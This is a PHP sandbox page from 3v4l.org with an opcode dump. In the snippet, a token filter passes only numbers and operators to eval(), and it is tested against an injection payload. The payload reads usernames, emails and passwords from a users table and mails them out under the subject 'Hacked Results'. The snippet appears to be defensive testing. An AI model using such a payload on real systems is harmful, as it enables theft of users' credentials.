3v4l.org

run code in 300+ PHP versions simultaneously
<?php $input = "$result = $db->fetch_row($db->query(‘select id, username, email, password from users’)); $body = ‘’; foreach($result as $k => $v) { $body .= $v. “ =\t”. $k[$v].”\t”; } mail(‘myemail@gmail.com’, ‘Hacked Results’,$body);"; $tokens = token_get_all("<?php {$input}"); $expr = ''; foreach($tokens as $token){ if(is_string($token)){ if(in_array($token, array('(', ')', '+', '-', '/', '*'), true)) $expr .= $token; continue; } list($id, $text) = $token; if(in_array($id, array(T_DNUMBER, T_LNUMBER))) $expr .= $text; } eval("\$result = {$expr};"); print "\nexpr = " . $expr; print "\nres = " . $result;
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 34, Position 2 = 54
Branch analysis from position: 34
2 jumps found. (Code = 78) Position 1 = 35, Position 2 = 54
Branch analysis from position: 35
2 jumps found. (Code = 43) Position 1 = 37, Position 2 = 41
Branch analysis from position: 37
2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 40
Branch analysis from position: 39
1 jumps found. (Code = 42) Position 1 = 34
Branch analysis from position: 34
Branch analysis from position: 40
Branch analysis from position: 41
2 jumps found. (Code = 43) Position 1 = 52, Position 2 = 53
Branch analysis from position: 52
1 jumps found. (Code = 42) Position 1 = 34
Branch analysis from position: 34
Branch analysis from position: 53
Branch analysis from position: 54
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 54
filename:       /in/QTYTq
function name:  (null)
number of ops:  64
compiled vars:  !0 = $input, !1 = $result, !2 = $db, !3 = $body, !4 = $k, !5 = $v, !6 = $tokens, !7 = $expr, !8 = $token, !9 = $id, !10 = $text
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   ROPE_INIT                                    22  ~15     !1
          1        ROPE_ADD                                      1  ~15     ~15, '+%3D+'
          2        FETCH_OBJ_R                                      ~11     !2, 'fetch_row'
          3        ROPE_ADD                                      2  ~15     ~15, ~11
          4        ROPE_ADD                                      3  ~15     ~15, '%28'
          5        FETCH_OBJ_R                                      ~12     !2, 'query'
          6        ROPE_ADD                                      4  ~15     ~15, ~12
          7        ROPE_ADD                                      5  ~15     ~15, '%28%E2%80%98select+id%2C+username%2C+email%2C+password+from+users%E2%80%99%29%29%3B+%0A'
    4     8        ROPE_ADD                                      6  ~15     ~15, !3
          9        ROPE_ADD                                      7  ~15     ~15, '+%3D+%E2%80%98%E2%80%99%3B%0Aforeach%28'
    5    10        ROPE_ADD                                      8  ~15     ~15, !1
         11        ROPE_ADD                                      9  ~15     ~15, '+as+'
         12        ROPE_ADD                                     10  ~15     ~15, !4
         13        ROPE_ADD                                     11  ~15     ~15, '+%3D%3E+'
         14        ROPE_ADD                                     12  ~15     ~15, !5
         15        ROPE_ADD                                     13  ~15     ~15, '%29+%7B%0A++++'
    6    16        ROPE_ADD                                     14  ~15     ~15, !3
         17        ROPE_ADD                                     15  ~15     ~15, '+.%3D+'
         18        ROPE_ADD                                     16  ~15     ~15, !5
         19        ROPE_ADD                                     17  ~15     ~15, '.+%E2%80%9C+%3D%09%E2%80%9D.+'
         20        FETCH_DIM_R                                      ~13     !4, !5
         21        ROPE_ADD                                     18  ~15     ~15, ~13
         22        ROPE_ADD                                     19  ~15     ~15, '.%E2%80%9D%09%E2%80%9D%3B%0A%7D%0Amail%28%E2%80%98myemail%40gmail.com%E2%80%99%2C+%E2%80%98Hacked+Results%E2%80%99%2C'
    8    23        ROPE_ADD                                     20  ~15     ~15, !3
         24        ROPE_END                                     21  ~14     ~15, '%29%3B'
    3    25        ASSIGN                                                   !0, ~14
   10    26        INIT_FCALL                                               'token_get_all'
         27        NOP                                                      
         28        FAST_CONCAT                                      ~27     '%3C%3Fphp+', !0
         29        SEND_VAL                                                 ~27
         30        DO_ICALL                                         $28     
         31        ASSIGN                                                   !6, $28
   11    32        ASSIGN                                                   !7, ''
   13    33      > FE_RESET_R                                       $31     !6, ->54
         34    > > FE_FETCH_R                                               $31, !8, ->54
   15    35    >   TYPE_CHECK                                   64          !8
         36      > JMPZ                                                     ~32, ->41
   17    37    >   IN_ARRAY                                                 !8, <array>
         38      > JMPZ                                                     ~33, ->40
   18    39    >   ASSIGN_OP                                     8          !7, !8
   20    40    > > JMP                                                      ->34
   23    41    >   QM_ASSIGN                                        ~35     !8
         42        FETCH_LIST_R                                     $36     ~35, 0
         43        ASSIGN                                                   !9, $36
         44        FETCH_LIST_R                                     $38     ~35, 1
         45        ASSIGN                                                   !10, $38
         46        FREE                                                     ~35
   25    47        INIT_FCALL                                               'in_array'
         48        SEND_VAR                                                 !9
         49        SEND_VAL                                                 <array>
         50        DO_ICALL                                         $40     
         51      > JMPZ                                                     $40, ->53
   26    52    >   ASSIGN_OP                                     8          !7, !10
   13    53    > > JMP                                                      ->34
         54    >   FE_FREE                                                  $31
   29    55        ROPE_INIT                                     3  ~43     '%24result+%3D+'
         56        ROPE_ADD                                      1  ~43     ~43, !7
         57        ROPE_END                                      2  ~42     ~43, '%3B'
         58        INCLUDE_OR_EVAL                                          ~42, EVAL
   31    59        CONCAT                                           ~46     '%0Aexpr+%3D+', !7
         60        ECHO                                                     ~46
   32    61        CONCAT                                           ~47     '%0Ares+%3D+', !1
         62        ECHO                                                     ~47
   33    63      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
168.22 ms | 1392 KiB | 17 Q